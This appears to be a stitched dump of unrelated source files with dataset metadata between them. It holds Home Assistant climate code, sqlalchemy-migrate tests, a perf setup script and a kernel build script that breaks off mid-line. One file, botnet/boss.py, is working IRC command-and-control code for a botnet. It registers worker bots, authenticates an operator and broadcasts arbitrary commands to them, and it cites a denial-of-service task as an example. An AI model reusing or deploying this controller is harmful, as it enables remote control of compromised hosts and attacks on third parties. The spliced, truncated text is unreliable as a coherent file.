"""Turn the entity on."""
if hasattr(self, "turn_on"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_on)
return
# Fake turn on
for mode in (HVAC_MODE_HEAT_COOL, HVAC_MODE_HEAT, HVAC_MODE_COOL):
if mode not in self.hvac_modes:
continue
await self.async_set_hvac_mode(mode)
break
async def async_turn_off(self) -> None:
"""Turn the entity off."""
if hasattr(self, "turn_off"):
# pylint: disable=no-member
await self.hass.async_add_executor_job(self.turn_off)
return
# Fake turn off
if HVAC_MODE_OFF in self.hvac_modes:
await self.async_set_hvac_mode(HVAC_MODE_OFF)
@property
def supported_features(self) -> int:
"""Return the list of supported features."""
raise NotImplementedError()
@property
def min_temp(self) -> float:
"""Return the minimum temperature."""
return convert_temperature(
DEFAULT_MIN_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def max_temp(self) -> float:
"""Return the maximum temperature."""
return convert_temperature(
DEFAULT_MAX_TEMP, TEMP_CELSIUS, self.temperature_unit
)
@property
def min_humidity(self) -> int:
"""Return the minimum humidity."""
return DEFAULT_MIN_HUMIDITY
@property
def max_humidity(self) -> int:
"""Return the maximum humidity."""
return DEFAULT_MAX_HUMIDITY
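# Minimal concrete subclass sketch (illustrative only; DemoThermostat is a
# hypothetical name, not part of this module). A read-only entity needs the
# abstract hvac_mode/hvac_modes plus temperature_unit and supported_features:
#
#   class DemoThermostat(ClimateEntity):
#       @property
#       def temperature_unit(self):
#           return TEMP_CELSIUS
#
#       @property
#       def hvac_mode(self):
#           return HVAC_MODE_HEAT
#
#       @property
#       def hvac_modes(self):
#           return [HVAC_MODE_HEAT, HVAC_MODE_OFF]
#
#       @property
#       def current_temperature(self):
#           return 21.0
#
#       @property
#       def supported_features(self):
#           return 0  # read-only: no target temperature or other features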
async def async_service_aux_heat(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle aux heat service."""
if service.data[ATTR_AUX_HEAT]:
await entity.async_turn_aux_heat_on()
else:
await entity.async_turn_aux_heat_off()
async def async_service_temperature_set(
entity: ClimateEntity, service: ServiceDataType
) -> None:
"""Handle set temperature service."""
hass = entity.hass
kwargs = {}
for value, temp in service.data.items():
if value in CONVERTIBLE_ATTRIBUTE:
kwargs[value] = convert_temperature(
temp, hass.config.units.temperature_unit, entity.temperature_unit
)
else:
kwargs[value] = temp
await entity.async_set_temperature(**kwargs)
class ClimateDevice(ClimateEntity):
"""Representation of a climate entity (for backwards compatibility)."""
def __init_subclass__(cls, **kwargs):
"""Print deprecation warning."""
super().__init_subclass__(**kwargs)
_LOGGER.warning(
"ClimateDevice is deprecated, modify %s to extend ClimateEntity",
cls.__name__,
)
| mit |
undu/irc | botnet/boss.py | 1 | 12237 | #!/usr/bin/env python
import gevent
import logging
import os
import random
import re
import sys
import time
from gevent import socket
from gevent.event import Event
from gevent.queue import Queue
from logging.handlers import RotatingFileHandler
from optparse import OptionParser
from irc import IRCConnection, IRCBot
class BotnetWorker(object):
"""\
Simple class to track available workers
"""
def __init__(self, nick, name):
self.nick = nick
self.name = name
self.awaiting_ping = Event()
class Task(object):
"""\
A single command sent to any number of workers. Serves as the storage for
any results returned by the workers.
"""
_id = 0
def __init__(self, command):
"""\
Initialize the Task with a command, where the command is a string
representing the action to be taken, e.g. `dos charlesleifer.com`
"""
self.command = command
Task._id += 1
self.id = Task._id
self.data = {}
self.workers = set()
self.finished = set()
def add(self, nick):
"""\
Indicate that the worker with given nick is performing this task
"""
self.data[nick] = ''
self.workers.add(nick)
def done(self, nick):
"""\
Indicate that the worker with the given nick has finished this task
"""
self.finished.add(nick)
def is_finished(self):
return self.finished == self.workers
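# Lifecycle sketch (comments only, illustrative): the boss creates a Task,
# each worker acknowledges with add(), streams output into data[nick], and
# signals completion with done().
#
#   task = Task('uptime')            # hypothetical command
#   task.add('worker1')              # worker1 acknowledged the task
#   task.data['worker1'] += 'up 3 days\n'
#   task.done('worker1')
#   task.is_finished()               # True once finished == workers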
class BotnetBot(IRCBot):
"""\
Command and control bot for a simple Botnet
"""
def __init__(self, conn, secret, channel):
# initialize connection and register callbacks via parent class
super(BotnetBot, self).__init__(conn)
# store secret used for authentication and nick of administrator
self.secret = secret
self.boss = None
# store channels -- possibly use random channel for the command channel?
self.channel = channel
self.cmd_channel = channel + '-cmd'
# store worker bots in a dictionary keyed by nickname
self.workers = {}
# used for uptime
self.start = time.time()
# start a greenlet that periodically checks worker health
self.start_worker_health_greenlet()
# store tasks in a dictionary keyed by task id
self.tasks = {}
# get a logger instance piggy-backing off the underlying connection's
# get_logger() method - this logger will be used to store data from
# the workers
self.logger = self.get_data_logger()
# grab a reference to the connection logger for logging server state
self.conn_logger = self.conn.logger
# join the two channels
self.conn.join(self.channel)
self.conn.join(self.cmd_channel)
def get_data_logger(self):
return self.conn.get_logger('botnet.botnetbot.data.logger', 'botnet.data.log')
def send_workers(self, msg):
"""\
Convenience method to send data to the workers via command channel
"""
self.respond(msg, self.cmd_channel)
def send_user(self, msg):
"""\
Convenience method to send data to the administrator via the normal channel
"""
self.respond(msg, self.channel)
def start_worker_health_greenlet(self):
"""\
Start a greenlet that monitors workers' health
"""
gevent.spawn(self._worker_health_greenlet)
def _worker_health_greenlet(self):
while 1:
# broadcast a message to all workers
self.send_workers('!worker-ping')
# indicate that all workers are awaiting ping
for worker_nick in self.workers:
self.workers[worker_nick].awaiting_ping.set()
# wait two minutes
gevent.sleep(120)
dead = []
# find all workers who didn't respond to the ping
for worker_nick, worker in self.workers.items():
if worker.awaiting_ping.is_set():
self.conn_logger.warn('worker [%s] is dead' % worker_nick)
dead.append(worker_nick)
if dead:
self.send_user('Removed %d dead workers' % len(dead))
for nick in dead:
self.unregister(nick)
def require_boss(self, callback):
"""\
Callback decorator that enforces that the calling user is the botnet administrator
"""
def inner(nick, message, channel, *args, **kwargs):
if nick != self.boss:
return
return callback(nick, message, channel, *args, **kwargs)
return inner
def command_patterns(self):
return (
('\/join', self.join_handler),
('\/quit', self.quit_handler),
('!auth (?P<password>.+)', self.auth),
('!execute (?:(?P<num_workers>\d+)? )?(?P<command>.+)', self.require_boss(self.execute_task)),
('!print(?: (?P<task_id>\d+))?', self.require_boss(self.print_task)),
('!register (?P<hostname>.+)', self.register),
('!stop', self.require_boss(self.stop)),
('!status', self.require_boss(self.status)),
('!task-data (?P<task_id>\d+):(?P<data>.+)', self.task_data),
('!task-finished (?P<task_id>\d+)', self.task_finished),
('!task-received (?P<task_id>\d+)', self.task_received),
('!uptime', self.require_boss(self.uptime)),
('!worker-pong (?P<hostname>.+)', self.worker_health_handler),
('!help', self.require_boss(self.help)),
)
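# Dispatch sketch (illustrative; assumes the IRCBot base class matches
# incoming messages against these regexes and passes named groups as
# keyword arguments to the handlers):
#
#   '!execute 3 uptime'
#       -> execute_task(nick, message, channel,
#                       num_workers='3', command='uptime')
#   '!task-data 7:some output'
#       -> task_data(nick, message, channel, task_id='7', data='some output')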
def join_handler(self, nick, message, channel):
self.logger.debug('%s joined #%s' % (nick, channel))
def quit_handler(self, nick, message, channel):
if channel == self.cmd_channel and nick in self.workers:
self.logger.info('Worker %s left, unregistering' % (nick))
self.unregister(nick)
def auth(self, nick, message, channel, password):
if not self.boss and password == self.secret:
self.boss = nick
self.logger.info('%s authenticated successfully' % nick)
return 'Success'
else:
self.logger.error('%s failed to authenticate' % nick)
def execute_task(self, nick, message, channel, command, num_workers=None):
task = Task(command)
self.tasks[task.id] = task
if num_workers is None or int(num_workers) >= len(self.workers):
# short-hand way of sending to all workers
num_workers = len(self.workers)
self.send_workers('!worker-execute %s:%s' % (task.id, task.command))
else:
num_workers = int(num_workers)
available_workers = set(self.workers.keys())
sent = 0
msg_template = '!worker-execute (%%s) %s:%s' % (task.id, task.command)
max_msg_len = 400
msg_len = len(msg_template % '')
msg_diff = max_msg_len - msg_len
available = msg_diff
send_to = []
# batch up command to workers
while sent < num_workers:
worker_nick = available_workers.pop()
send_to.append(worker_nick)
sent += 1
available -= (len(worker_nick) + 1)
if available <= 0 or sent == num_workers:
self.send_workers(msg_template % (','.join(send_to)))
available = msg_diff
send_to = []
self.send_user('Scheduled task: "%s" with id %s [%d workers]' % (
task.command, task.id, num_workers
))
def execute_task_once(self, nick, message, channel, command):
task = Task(command)
self.tasks[task.id] = task
worker = self.workers[random.choice(self.workers.keys())]
self.send_user('Scheduled task: "%s" with id %s - worker: [%s:%s]' % (
task.command, task.id, worker.nick, worker.name
))
self.respond('!worker-execute %s:%s' % (task.id, task.command), nick=worker.nick)
def print_task(self, nick, message, channel, task_id=None):
if not self.tasks:
return 'No tasks to print'
task_id = int(task_id or max(self.tasks.keys()))
task = self.tasks[task_id]
def printer(task):
for nick, data in task.data.iteritems():
worker = self.workers[nick]
self.send_user('[%s:%s] - %s' % (worker.nick, worker.name, task.command))
for line in data.splitlines():
self.send_user(line.strip())
gevent.sleep(.2)
gevent.spawn(printer, task)
def uptime(self, nick, message, channel):
curr = time.time()
seconds_diff = curr - self.start
hours, remainder = divmod(seconds_diff, 3600)
minutes, seconds = divmod(remainder, 60)
return 'Uptime: %d:%02d:%02d' % (hours, minutes, seconds)
def register(self, nick, message, channel, hostname):
if nick not in self.workers:
self.workers[nick] = BotnetWorker(nick, hostname)
self.logger.info('added worker [%s]' % nick)
else:
self.logger.warn('already registered [%s]' % nick)
return '!register-success %s' % self.cmd_channel
def unregister(self, worker_nick):
del(self.workers[worker_nick])
def status(self, nick, message, channel):
self.send_user('%s workers available' % len(self.workers))
self.send_user('%s tasks have been scheduled' % len(self.tasks))
def stop(self, nick, message, channel):
self.send_workers('!worker-stop')
def task_data(self, nick, message, channel, task_id, data):
# add the data to the task's data
self.tasks[int(task_id)].data[nick] += '%s\n' % data
def task_finished(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.done(nick)
self.conn_logger.info('task [%s] finished by worker %s' % (task.id, nick))
self.logger.info('%s:%s:%s' % (task.id, nick, task.data))
if task.is_finished():
self.send_user('Task %s completed by %s workers' % (task.id, len(task.data)))
def task_received(self, nick, message, channel, task_id):
task = self.tasks[int(task_id)]
task.add(nick)
self.conn_logger.info('task [%s] received by worker %s' % (task.id, nick))
def worker_health_handler(self, nick, message, channel, hostname):
if nick in self.workers:
self.workers[nick].awaiting_ping.clear()
self.logger.debug('Worker [%s] is alive' % nick)
else:
self.register(nick, message, channel, hostname)
def help(self, nick, message, channel):
self.send_user('!execute (num workers) <command> -- run "command" on workers')
self.send_user('!print (task id) -- print output of tasks or task with id')
self.send_user('!stop -- tell workers to stop their current task')
self.send_user('!status -- get status on workers and tasks')
self.send_user('!uptime -- boss uptime')
def get_parser():
parser = OptionParser(usage='%prog [options]')
parser.add_option('--server', '-s', dest='server', default='irc.freenode.net',
help='IRC server to connect to')
parser.add_option('--port', '-p', dest='port', default=6667,
help='Port to connect on', type='int')
parser.add_option('--nick', '-n', dest='nick', default='boss1337',
help='Nick to use')
parser.add_option('--secret', '-x', dest='secret', default='password')
parser.add_option('--channel', '-c', dest='channel', default='#botwars-test')
parser.add_option('--logfile', '-f', dest='logfile')
parser.add_option('--verbosity', '-v', dest='verbosity', default=1, type='int')
return parser
if __name__ == '__main__':
parser = get_parser()
(options, args) = parser.parse_args()
conn = IRCConnection(options.server, options.port, options.nick,
options.logfile, options.verbosity)
bot = BotnetBot(conn, options.secret, options.channel)
bot.run()
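# Example invocation (a sketch; the values simply restate the defaults
# defined in get_parser above):
#
#   python boss.py --server irc.freenode.net --port 6667 --nick boss1337 \
#       --secret password --channel '#botwars-test' --verbosity 1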
| mit |
andras-tim/sqlalchemy-migrate | migrate/tests/versioning/test_script.py | 63 | 10322 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import imp
import os
import sys
import shutil
import six
from migrate import exceptions
from migrate.versioning import version, repository
from migrate.versioning.script import *
from migrate.versioning.util import *
from migrate.tests import fixture
from migrate.tests.fixture.models import tmp_sql_table
class TestBaseScript(fixture.Pathed):
def test_all(self):
"""Testing all basic BaseScript operations"""
# verify / source / run
src = self.tmp()
open(src, 'w').close()
bscript = BaseScript(src)
BaseScript.verify(src)
self.assertEqual(bscript.source(), '')
self.assertRaises(NotImplementedError, bscript.run, 'foobar')
class TestPyScript(fixture.Pathed, fixture.DB):
cls = PythonScript
def test_create(self):
"""We can create a migration script"""
path = self.tmp_py()
# Creating a file that doesn't exist should succeed
self.cls.create(path)
self.assertTrue(os.path.exists(path))
# Created file should be a valid script (If not, raises an error)
self.cls.verify(path)
# Can't create it again: it already exists
self.assertRaises(exceptions.PathFoundError,self.cls.create,path)
@fixture.usedb(supported='sqlite')
def test_run(self):
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
self.assertRaises(exceptions.ScriptError, pyscript.run, self.engine, 0)
self.assertRaises(exceptions.ScriptError, pyscript._func, 'foobar')
# clean pyc file
if six.PY3:
os.remove(imp.cache_from_source(script_path))
else:
os.remove(script_path + 'c')
# test deprecated upgrade/downgrade with no arguments
contents = open(script_path, 'r').read()
f = open(script_path, 'w')
f.write(contents.replace("upgrade(migrate_engine)", "upgrade()"))
f.close()
pyscript = PythonScript(script_path)
pyscript._module = None
try:
pyscript.run(self.engine, 1)
pyscript.run(self.engine, -1)
except exceptions.ScriptError:
pass
else:
self.fail()
def test_verify_notfound(self):
"""Correctly verify a python migration script: nonexistant file"""
path = self.tmp_py()
self.assertFalse(os.path.exists(path))
# Fails on empty path
self.assertRaises(exceptions.InvalidScriptError,self.cls.verify,path)
self.assertRaises(exceptions.InvalidScriptError,self.cls,path)
def test_verify_invalidpy(self):
"""Correctly verify a python migration script: invalid python file"""
path=self.tmp_py()
# Create a file containing invalid Python
f = open(path,'w')
f.write("def fail")
f.close()
self.assertRaises(Exception,self.cls.verify_module,path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(Exception,(lambda x: x.module),py)
def test_verify_nofuncs(self):
"""Correctly verify a python migration script: valid python file; no upgrade func"""
path = self.tmp_py()
# Create a valid Python file without an upgrade() function
f = open(path, 'w')
f.write("def zergling():\n\tprint('rush')")
f.close()
self.assertRaises(exceptions.InvalidScriptError, self.cls.verify_module, path)
# script isn't verified on creation, but on module reference
py = self.cls(path)
self.assertRaises(exceptions.InvalidScriptError,(lambda x: x.module),py)
@fixture.usedb(supported='sqlite')
def test_preview_sql(self):
"""Preview SQL abstract from ORM layer (sqlite)"""
path = self.tmp_py()
f = open(path, 'w')
content = '''
from migrate import *
from sqlalchemy import *
metadata = MetaData()
UserGroup = Table('Link', metadata,
Column('link1ID', Integer),
Column('link2ID', Integer),
UniqueConstraint('link1ID', 'link2ID'))
def upgrade(migrate_engine):
metadata.create_all(migrate_engine)
'''
f.write(content)
f.close()
pyscript = self.cls(path)
SQL = pyscript.preview_sql(self.url, 1)
self.assertEqualIgnoreWhitespace("""
CREATE TABLE "Link"
("link1ID" INTEGER,
"link2ID" INTEGER,
UNIQUE ("link1ID", "link2ID"))
""", SQL)
# TODO: test: No SQL should be executed!
def test_verify_success(self):
"""Correctly verify a python migration script: success"""
path = self.tmp_py()
# Succeeds after creating
self.cls.create(path)
self.cls.verify(path)
# test for PythonScript.make_update_script_for_model
@fixture.usedb()
def test_make_update_script_for_model(self):
"""Construct script source from differences of two models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue("['User'].create()" in source_script)
self.assertTrue("['User'].drop()" in source_script)
@fixture.usedb()
def test_make_update_script_for_equal_models(self):
"""Try to make update script from two identical models"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source + self.model_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertFalse('User.create()' in source_script)
self.assertFalse('User.drop()' in source_script)
@fixture.usedb()
def test_make_update_script_direction(self):
"""Check update scripts go in the right direction"""
self.setup_model_params()
self.write_file(self.first_model_path, self.base_source)
self.write_file(self.second_model_path, self.base_source + self.model_source)
source_script = self.pyscript.make_update_script_for_model(
engine=self.engine,
oldmodel=load_model('testmodel_first:meta'),
model=load_model('testmodel_second:meta'),
repository=self.repo_path,
)
self.assertTrue(0
< source_script.find('upgrade')
< source_script.find("['User'].create()")
< source_script.find('downgrade')
< source_script.find("['User'].drop()"))
def setup_model_params(self):
self.script_path = self.tmp_py()
self.repo_path = self.tmp()
self.first_model_path = os.path.join(self.temp_usable_dir, 'testmodel_first.py')
self.second_model_path = os.path.join(self.temp_usable_dir, 'testmodel_second.py')
self.base_source = """from sqlalchemy import *\nmeta = MetaData()\n"""
self.model_source = """
User = Table('User', meta,
Column('id', Integer, primary_key=True),
Column('login', Unicode(40)),
Column('passwd', String(40)),
)"""
self.repo = repository.Repository.create(self.repo_path, 'repo')
self.pyscript = PythonScript.create(self.script_path)
sys.modules.pop('testmodel_first', None)
sys.modules.pop('testmodel_second', None)
def write_file(self, path, contents):
f = open(path, 'w')
f.write(contents)
f.close()
class TestSqlScript(fixture.Pathed, fixture.DB):
@fixture.usedb()
def test_error(self):
"""Test if exception is raised on wrong script source"""
src = self.tmp()
f = open(src, 'w')
f.write("""foobar""")
f.close()
sqls = SqlScript(src)
self.assertRaises(Exception, sqls.run, self.engine)
@fixture.usedb()
def test_success(self):
"""Test sucessful SQL execution"""
# cleanup and prepare python script
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
script_path = self.tmp_py()
pyscript = PythonScript.create(script_path)
# populate python script
contents = open(script_path, 'r').read()
contents = contents.replace("pass", "tmp_sql_table.create(migrate_engine)")
contents = 'from migrate.tests.fixture.models import tmp_sql_table\n' + contents
f = open(script_path, 'w')
f.write(contents)
f.close()
# write SQL script from python script preview
pyscript = PythonScript(script_path)
src = self.tmp()
f = open(src, 'w')
f.write(pyscript.preview_sql(self.url, 1))
f.close()
# run the change
sqls = SqlScript(src)
sqls.run(self.engine)
tmp_sql_table.metadata.drop_all(self.engine, checkfirst=True)
@fixture.usedb()
def test_transaction_management_statements(self):
"""
Test that we can successfully execute SQL scripts with transaction
management statements.
"""
for script_pattern in (
"BEGIN TRANSACTION; %s; COMMIT;",
"BEGIN; %s; END TRANSACTION;",
"/* comment */BEGIN TRANSACTION; %s; /* comment */COMMIT;",
"/* comment */ BEGIN TRANSACTION; %s; /* comment */ COMMIT;",
"""
-- comment
BEGIN TRANSACTION;
%s;
-- comment
COMMIT;""",
):
test_statement = ("CREATE TABLE TEST1 (field1 int); "
"DROP TABLE TEST1")
script = script_pattern % test_statement
src = self.tmp()
with open(src, 'wt') as f:
f.write(script)
sqls = SqlScript(src)
sqls.run(self.engine)
| mit |
codename13/kylessopen-3.4-port | tools/perf/util/setup.py | 4998 | 1330 | #!/usr/bin/python2
from distutils.core import setup, Extension
from os import getenv
from distutils.command.build_ext import build_ext as _build_ext
from distutils.command.install_lib import install_lib as _install_lib
class build_ext(_build_ext):
def finalize_options(self):
_build_ext.finalize_options(self)
self.build_lib = build_lib
self.build_temp = build_tmp
class install_lib(_install_lib):
def finalize_options(self):
_install_lib.finalize_options(self)
self.build_dir = build_lib
cflags = ['-fno-strict-aliasing', '-Wno-write-strings']
cflags += getenv('CFLAGS', '').split()
build_lib = getenv('PYTHON_EXTBUILD_LIB')
build_tmp = getenv('PYTHON_EXTBUILD_TMP')
ext_sources = [f.strip() for f in file('util/python-ext-sources')
if len(f.strip()) > 0 and f[0] != '#']
perf = Extension('perf',
sources = ext_sources,
include_dirs = ['util/include'],
extra_compile_args = cflags,
)
setup(name='perf',
version='0.1',
description='Interface with the Linux profiling infrastructure',
author='Arnaldo Carvalho de Melo',
author_email='[email protected]',
license='GPLv2',
url='http://perf.wiki.kernel.org',
ext_modules=[perf],
cmdclass={'build_ext': build_ext, 'install_lib': install_lib})
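# Usage sketch (an assumption about the surrounding build, not documented
# here): the perf Makefile exports the staging directories before invoking
# this script, roughly:
#
#   PYTHON_EXTBUILD_LIB=/tmp/build/lib/ PYTHON_EXTBUILD_TMP=/tmp/build/tmp/ \
#       python2 util/setup.py build_ext --quiet
#
# The build_ext/install_lib overrides above redirect distutils output into
# those directories instead of the default build/ tree.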
| gpl-2.0 |
NinjahMeh/android_kernel_huawei_angler | scripts/build-all.py | 704 | 14699 | #! /usr/bin/env python
# Copyright (c) 2009-2014, The Linux Foundation. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of The Linux Foundation nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Build the kernel for all targets using the Android build environment.
from collections import namedtuple
import errno
import glob
from optparse import OptionParser
import os
import re
import shutil
import subprocess
import sys
import threading
import Queue
version = 'build-all.py, version 1.99'
build_dir = '../all-kernels'
make_command = ["vmlinux", "modules", "dtbs"]
all_options = {}
compile64 = os.environ.get('CROSS_COMPILE64')
def error(msg):
sys.stderr.write("error: %s\n" % msg)
def fail(msg):
"""Fail with a user-printed message"""
error(msg)
sys.exit(1)
if not os.environ.get('CROSS_COMPILE'):
fail("CROSS_COMPILE must be set in the environment")
def check_kernel():
"""Ensure that PWD is a kernel directory"""
if (not os.path.isfile('MAINTAINERS') or
not os.path.isfile('arch/arm/mach-msm/Kconfig')):
fail("This doesn't seem to be an MSM kernel dir")
def check_build():
"""Ensure that the build directory is present."""
if not os.path.isdir(build_dir):
try:
os.makedirs(build_dir)
except OSError as exc:
if exc.errno == errno.EEXIST:
pass
else:
raise
def build_threads():
"""Determine the number of build threads requested by the user"""
if all_options.load_average:
return all_options.load_average
return all_options.jobs or 1
failed_targets = []
BuildResult = namedtuple('BuildResult', ['status', 'messages'])
class BuildSequence(namedtuple('BuildSequence', ['log_name', 'short_name', 'steps'])):
def set_width(self, width):
self.width = width
def __enter__(self):
self.log = open(self.log_name, 'w')
def __exit__(self, type, value, traceback):
self.log.close()
def run(self):
self.status = None
messages = ["Building: " + self.short_name]
def printer(line):
text = "[%-*s] %s" % (self.width, self.short_name, line)
messages.append(text)
self.log.write(text)
self.log.write('\n')
for step in self.steps:
st = step.run(printer)
if st:
self.status = BuildResult(self.short_name, messages)
break
if not self.status:
self.status = BuildResult(None, messages)
class BuildTracker:
"""Manages all of the steps necessary to perform a build. The
build consists of one or more sequences of steps. The different
sequences can be processed independently, while the steps within a
sequence must be done in order."""
def __init__(self):
self.sequence = []
self.lock = threading.Lock()
def add_sequence(self, log_name, short_name, steps):
self.sequence.append(BuildSequence(log_name, short_name, steps))
def longest_name(self):
longest = 0
for seq in self.sequence:
longest = max(longest, len(seq.short_name))
return longest
def __repr__(self):
return "BuildTracker(%s)" % self.sequence
def run_child(self, seq):
seq.set_width(self.longest)
tok = self.build_tokens.get()
with self.lock:
print "Building:", seq.short_name
with seq:
seq.run()
self.results.put(seq.status)
self.build_tokens.put(tok)
def run(self):
self.longest = self.longest_name()
self.results = Queue.Queue()
children = []
errors = []
self.build_tokens = Queue.Queue()
nthreads = build_threads()
print "Building with", nthreads, "threads"
for i in range(nthreads):
self.build_tokens.put(True)
for seq in self.sequence:
child = threading.Thread(target=self.run_child, args=[seq])
children.append(child)
child.start()
for child in children:
stats = self.results.get()
if all_options.verbose:
with self.lock:
for line in stats.messages:
print line
sys.stdout.flush()
if stats.status:
errors.append(stats.status)
for child in children:
child.join()
if errors:
fail("\n ".join(["Failed targets:"] + errors))
class PrintStep:
"""A step that just prints a message"""
def __init__(self, message):
self.message = message
def run(self, outp):
outp(self.message)
class MkdirStep:
"""A step that makes a directory"""
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("mkdir %s" % self.direc)
os.mkdir(self.direc)
class RmtreeStep:
def __init__(self, direc):
self.direc = direc
def run(self, outp):
outp("rmtree %s" % self.direc)
shutil.rmtree(self.direc, ignore_errors=True)
class CopyfileStep:
def __init__(self, src, dest):
self.src = src
self.dest = dest
def run(self, outp):
outp("cp %s %s" % (self.src, self.dest))
shutil.copyfile(self.src, self.dest)
class ExecStep:
def __init__(self, cmd, **kwargs):
self.cmd = cmd
self.kwargs = kwargs
def run(self, outp):
outp("exec: %s" % (" ".join(self.cmd),))
with open('/dev/null', 'r') as devnull:
proc = subprocess.Popen(self.cmd, stdin=devnull,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
**self.kwargs)
stdout = proc.stdout
while True:
line = stdout.readline()
if not line:
break
line = line.rstrip('\n')
outp(line)
result = proc.wait()
if result != 0:
return ('error', result)
else:
return None
class Builder():
def __init__(self, name, defconfig):
self.name = name
self.defconfig = defconfig
self.confname = self.defconfig.split('/')[-1]
# Determine if this is a 64-bit target based on the location
# of the defconfig.
self.make_env = os.environ.copy()
if "/arm64/" in defconfig:
if compile64:
self.make_env['CROSS_COMPILE'] = compile64
else:
fail("Attempting to build 64-bit, without setting CROSS_COMPILE64")
self.make_env['ARCH'] = 'arm64'
else:
self.make_env['ARCH'] = 'arm'
self.make_env['KCONFIG_NOTIMESTAMP'] = 'true'
self.log_name = "%s/log-%s.log" % (build_dir, self.name)
def build(self):
steps = []
dest_dir = os.path.join(build_dir, self.name)
log_name = "%s/log-%s.log" % (build_dir, self.name)
steps.append(PrintStep('Building %s in %s log %s' %
(self.name, dest_dir, log_name)))
if not os.path.isdir(dest_dir):
steps.append(MkdirStep(dest_dir))
defconfig = self.defconfig
dotconfig = '%s/.config' % dest_dir
savedefconfig = '%s/defconfig' % dest_dir
staging_dir = 'install_staging'
modi_dir = '%s' % staging_dir
hdri_dir = '%s/usr' % staging_dir
steps.append(RmtreeStep(os.path.join(dest_dir, staging_dir)))
steps.append(ExecStep(['make', 'O=%s' % dest_dir,
self.confname], env=self.make_env))
if not all_options.updateconfigs:
# Build targets can be dependent upon the completion of
# previous build targets, so build them one at a time.
cmd_line = ['make',
'INSTALL_HDR_PATH=%s' % hdri_dir,
'INSTALL_MOD_PATH=%s' % modi_dir,
'O=%s' % dest_dir]
build_targets = []
for c in make_command:
if re.match(r'^-{1,2}\w', c):
cmd_line.append(c)
else:
build_targets.append(c)
for t in build_targets:
steps.append(ExecStep(cmd_line + [t], env=self.make_env))
# Copy the defconfig back.
if all_options.configs or all_options.updateconfigs:
steps.append(ExecStep(['make', 'O=%s' % dest_dir,
'savedefconfig'], env=self.make_env))
steps.append(CopyfileStep(savedefconfig, defconfig))
return steps
def update_config(file, str):
print 'Updating %s with \'%s\'\n' % (file, str)
with open(file, 'a') as defconfig:
defconfig.write(str + '\n')
def scan_configs():
"""Get the full list of defconfigs appropriate for this tree."""
names = []
arch_pats = (
r'[fm]sm[0-9]*_defconfig',
r'apq*_defconfig',
r'qsd*_defconfig',
r'mdm*_defconfig',
r'mpq*_defconfig',
)
arch64_pats = (
r'msm*_defconfig',
)
for p in arch_pats:
for n in glob.glob('arch/arm/configs/' + p):
name = os.path.basename(n)[:-10]
names.append(Builder(name, n))
if 'CROSS_COMPILE64' in os.environ:
for p in arch64_pats:
for n in glob.glob('arch/arm64/configs/' + p):
name = os.path.basename(n)[:-10] + "-64"
names.append(Builder(name, n))
return names
def build_many(targets):
print "Building %d target(s)" % len(targets)
# If we are requesting multiple builds, divide down the job number
# to construct the make_command, giving it a floor of 2, so there
# is still some parallelism.
if all_options.jobs and all_options.jobs > 1:
j = max(all_options.jobs / len(targets), 2)
make_command.append("-j" + str(j))
tracker = BuildTracker()
for target in targets:
if all_options.updateconfigs:
update_config(target.defconfig, all_options.updateconfigs)
steps = target.build()
tracker.add_sequence(target.log_name, target.name, steps)
tracker.run()
def main():
global make_command
check_kernel()
check_build()
configs = scan_configs()
usage = ("""
%prog [options] all -- Build all targets
%prog [options] target target ... -- List specific targets
%prog [options] perf -- Build all perf targets
%prog [options] noperf -- Build all non-perf targets""")
parser = OptionParser(usage=usage, version=version)
parser.add_option('--configs', action='store_true',
dest='configs',
help="Copy configs back into tree")
parser.add_option('--list', action='store_true',
dest='list',
help='List available targets')
parser.add_option('-v', '--verbose', action='store_true',
dest='verbose',
help='Output to stdout in addition to log file')
parser.add_option('--oldconfig', action='store_true',
dest='oldconfig',
help='Only process "make oldconfig"')
parser.add_option('--updateconfigs',
dest='updateconfigs',
help="Update defconfigs with provided option setting, "
